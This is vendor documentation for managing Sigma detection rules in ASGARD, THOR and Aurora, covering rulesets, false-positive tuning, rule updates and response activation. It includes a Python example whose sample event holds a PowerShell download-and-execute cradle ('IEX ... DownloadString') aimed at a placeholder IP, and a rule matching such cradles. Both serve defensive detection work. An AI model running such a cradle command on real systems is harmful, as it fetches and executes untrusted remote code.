3.12. Sigma

THOR and Aurora use Sigma to improve detections.

3.12.1. What is Sigma?

From the project website:

Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.

Sigma is for log files what Snort is for network traffic and YARA is for files.

3.12.2. Creating a Ruleset

Rulesets group rules into manageable units. Because an asset can have only one service configuration, the ruleset assigned to a service configuration determines which rules run on the assets that use it. Default rulesets are available for the high and critical Sigma levels. To create a custom ruleset, go to Service Control > Sigma > Rulesets > Create Ruleset.

Create a Ruleset

If you selected automatic addition of new Sigma rules to the new ruleset, they are added now. If you did not select any Sigma levels for automatic addition, add the desired rules manually by going to Service Control > Sigma > Rules. Select the checkboxes for the rules you want to add, then click Add to Ruleset. A rule can be assigned to multiple rulesets.

Add a Rule to Rulesets

Note

You need to commit and push your changes after editing a ruleset. ASGARD must restart the service controller to read a new configuration. To avoid multiple restarts when an administrator performs several configuration changes in succession, this restart is not automatic: the administrator initiates the reload of the new configuration by going to Service Control > Sigma > Rulesets and performing the Compile ruleset action (gear wheels). Whether a ruleset still needs compiling is indicated in the Uncompiled Changes column.

Uncompiled Changes Indicator

3.12.3. Choosing which Rules to Activate

We do not recommend enabling all available rules on an asset. Start with all "critical" rules, then advance to all "high" rules. Default rulesets are available for both levels. "Medium" rules should not be enabled in bulk, and "low" or "informational" rules should generally remain disabled. Individual medium rules that increase an organization's detection coverage without triggering many false positives can be added to the active configuration, but should be tested rule by rule.

To add rules to a ruleset more easily, use the column filters to select the desired rules and add them in bulk to a ruleset. For example, you can add all rules with level "critical" to a ruleset:

Add all critical rules to a ruleset

Another useful way to pivot the Sigma rule database is to use MITRE ATT&CK® IDs.

Search by MITRE ATT&CK® ID

You can also search the title or description field of the rules. To search the rule itself, use the "Rule" column. The "Rule" column is not shown by default and must be added with the gear wheel button.

Search by Rule Title or Description

3.12.4. False Positive Tuning of Sigma Rules

Each environment is different. Some rules may trigger false positive matches in your environment. You have multiple options to address this.

  1. If it is a general false positive that is not limited to your environment, consider reporting it as a GitHub issue or by email to rules@nextron-systems.com. We will take care of the tuning for you and other users.

  2. If the false positive is specific to your environment, you can tune single Sigma rules at Service Control > Sigma > Rules: filter for the rule in question and choose the "Edit false positive filters of this rule" action. Here you can perform simple rule tuning. Click the Add False Positive Filter button to add individual lines that exclude the false-positive events. These lines are OR-connected: the event is not matched if any one of the lines matches. They are applied on top of the rule logic and persist through automatic rule updates.

    Example of the false positive tuning of a Sigma rule

    To see the resulting rule, click the "Show Preview" button or look at the "Compiled Rule" row in the rule's drop-down menu.

    To review tuned rules, add the "Filters" column to your view using the gear wheels icon, then use that column's NOT filter to show only the rules with a non-empty Filters value.

  3. If the rule adds too much noise and tuning is not practical, you can remove the rule from the ruleset for a subset of your systems. This may require a separate ruleset for that use case. You can also disable the rule entirely with the Disable this rule action. Disabling the rule affects it in all rulesets.

After tuning a rule, the rulesets using that rule must be recompiled at Service Control > Sigma > Rulesets.

3.12.5. Adding Custom Rules

Custom rules can be added using the Sigma format according to the specification. You can upload single files or a ZIP compressed archive. This can be done at Service Control > Sigma > Rules > Upload Rules.
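To make the semantics of the false-positive filters from 3.12.4 and the structure of a rule in Sigma format concrete, here is an added Python example; it is not ASGARD, THOR or Aurora code. It holds a constructed Sigma rule in the dict form of its YAML, evaluates the rule's own condition against constructed process-creation events, and then layers OR-connected filter lines on top of that condition the way the compiled-rule preview presents it. The rule, the events, the `Field|modifier: value` format of a filter line and the `fp_filter_N` names are assumptions made for this example; the real filter syntax and compiled output are what ASGARD shows in the Show Preview dialog.

```python
"""Sigma-style matching with OR-connected false-positive filter lines on top.
Added illustration, not ASGARD, THOR or Aurora code: the rule, the events and
the "Field|modifier: value" filter-line format are constructed assumptions."""
import re

# Constructed rule, written as the dict form of a Sigma YAML file.
RULE = {
    "title": "PowerShell Download Cradle (constructed example)",
    "level": "high",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],  # list = OR
        },
        "filter_sccm": {"ParentImage|endswith": "\\ccmexec.exe"},  # exclusion shipped with the rule
        "condition": "selection and not filter_sccm",
    },
}

# Constructed process-creation events; the list index serves as the event id.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell -c Invoke-WebRequest -Uri https://inventory.example.internal/agent.ps1"},
    {"Image": PS, "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString('https://sccm.example.internal/x')"},
]

# Environment-specific tuning: one line per "Add False Positive Filter" entry,
# OR-connected and applied on top of the rule's own condition (format assumed).
FP_FILTERS = ["CommandLine|contains: inventory.example.internal"]


def _match_field(event, key, pattern):
    """One 'Field|modifier' entry; Sigma string matching is case-insensitive."""
    field, _, mod = key.partition("|")
    value = str(event.get(field, "")).lower()
    ops = {"": value.__eq__, "contains": value.__contains__,
           "startswith": value.startswith, "endswith": value.endswith}  # KeyError on other modifiers
    patterns = pattern if isinstance(pattern, list) else [pattern]
    return any(ops[mod](str(p).lower()) for p in patterns)


def _match_map(event, selection):  # every key of a selection map must match (AND)
    return all(_match_field(event, k, v) for k, v in selection.items())


def _eval_condition(cond, names):
    """Recursive-descent evaluator for 'a and not b or (c)'; '1 of x*' forms are not handled."""
    tok = re.findall(r"\(|\)|\w+", cond) + [None]  # None marks the end of input
    pos = 0

    def factor():
        nonlocal pos
        pos += 1
        t = tok[pos - 1]
        if t == "not":
            return not factor()
        if t == "(":
            val = expr()
            pos += 1
            if tok[pos - 1] != ")":
                raise ValueError("unbalanced parentheses in condition")
            return val
        return names[t]  # KeyError if the condition names an undefined selection

    def term():
        nonlocal pos
        val = factor()
        while tok[pos] == "and":
            pos += 1
            val = factor() and val  # right-hand side is always evaluated
        return val

    def expr():
        nonlocal pos
        val = term()
        while tok[pos] == "or":
            pos += 1
            val = term() or val
        return val

    result = expr()
    if tok[pos] is not None:
        raise ValueError("trailing tokens in condition")
    return result


def compile_rule(rule, fp_filters):
    """Tuned rule as a preview would show it: each filter line becomes a selection
    fp_filter_N and the condition is wrapped as '(cond) and not (fp_filter_1 or ...)'."""
    det = dict(rule["detection"])
    fps = {f"fp_filter_{i}": line.partition(":") for i, line in enumerate(fp_filters, 1)}
    det.update({name: {k.strip(): v.strip()} for name, (k, _, v) in fps.items()})
    if fps:
        det["condition"] = f"({det['condition']}) and not ({' or '.join(fps)})"
    return {**rule, "detection": det}


def matching_events(rule, events, fp_filters=()):
    """Indices of the events the (tuned) rule fires on."""
    det = compile_rule(rule, list(fp_filters))["detection"]
    selections = {k: v for k, v in det.items() if k != "condition"}
    return [i for i, ev in enumerate(events)
            if _eval_condition(det["condition"], {k: _match_map(ev, v) for k, v in selections.items()})]


if __name__ == "__main__":
    print("untuned:", matching_events(RULE, EVENTS))              # [0, 1]
    print("tuned:  ", matching_events(RULE, EVENTS, FP_FILTERS))  # [0]
    print("preview:", compile_rule(RULE, FP_FILTERS)["detection"]["condition"])
```

Run stand-alone, the block shows the untuned rule firing on events 0 and 1, while the single filter line suppresses event 1 without touching the rule's own `filter_sccm` exclusion, which still drops event 2. Because the filter lines are appended as a `not (...)` clause ANDed with the original condition, they can only remove matches, never add them, so a mistyped filter line cannot widen a rule.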

Adding Custom Rules

3.12.6. Rule and Response Updates

When the Aurora signature package delivers new rules or rule updates, they must be applied manually before they take effect on Aurora agents managed by ASGARD. An indicator is shown in the Web UI, and rule changes can be reviewed and applied at Service Control > Sigma > Rule Updates.

Sigma Rule Updates for Aurora

Clicking the Update button in the "Update Available" column opens a diff view that shows the changes and allows the user to apply or discard them. If you do not need to review each individual change, you can apply all changes using the Update All Rules button.

Response action updates can be viewed and applied at Service Control > Sigma > Response Updates.

3.12.7. How to Activate Responses

As a fail-safe and for administrative control, responses are only simulated unless they are explicitly set to active. Activation must be done at each of the following levels:

  • Service configuration level

  • Ruleset configuration level (on updates)

  • Ruleset rule level

If a rule's response is set to simulation at any of these levels, the response action is not executed; only a log line describing the action that would have been performed is written. You can see an overview of the state of all responses in the Service Control > Aurora > Configurations menu.

Aurora Configuration Response Action Overview

  1. indicates whether responses are activated at the configuration level. Edit the configuration to change it.

  2. indicates how many rules are simulated in that ruleset, or in total.

  3. indicates how many rules have active responses in that ruleset, or in total.

To change the status of a response in the ruleset, click the ruleset link. You can view all simulated or all active responses. Use the checkbox and the button in the upper-right corner to switch the response status of the rules between active and simulated.

Response Configuration in Rulesets

The default response mode of a ruleset is important for the behavior of response updates. It can be seen at Service Control > Sigma > Rulesets in the Default Response Mode column.

Ruleset Default Response Mode

If "Simulation" is selected, the response actions of new and updated rules are put in simulation mode. If "Active" is selected, new rules are automatically put in active mode, while updated rules keep their current response mode. We recommend leaving the default response mode set to "Simulation", so that a rule update can never silently start executing responses on your assets.